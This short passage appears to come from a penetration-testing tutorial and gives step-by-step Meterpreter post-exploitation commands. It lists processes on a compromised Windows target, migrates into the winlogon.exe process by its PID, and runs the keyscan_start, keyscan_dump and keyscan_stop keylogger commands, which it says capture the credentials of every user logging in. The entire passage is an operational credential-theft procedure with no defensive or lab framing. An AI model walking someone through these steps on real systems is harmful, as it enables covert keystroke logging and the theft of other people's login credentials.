Once you got the meterpreter session use ‘ps‘ command to displays a list of running processes on the target.
The next step is we need to migrate Meterpreter to the winlogon.exe process. Victim winlogon.exe process ID is 600. Now type migrate 600 now we can start the keylogger
Keyscan_start – to start the keylogger
Keyscan_dump – to print captured keystrokes
Keyscan_stop – to stop the keylogger
This will capture the credentials of all users logging into the system as long as this is running.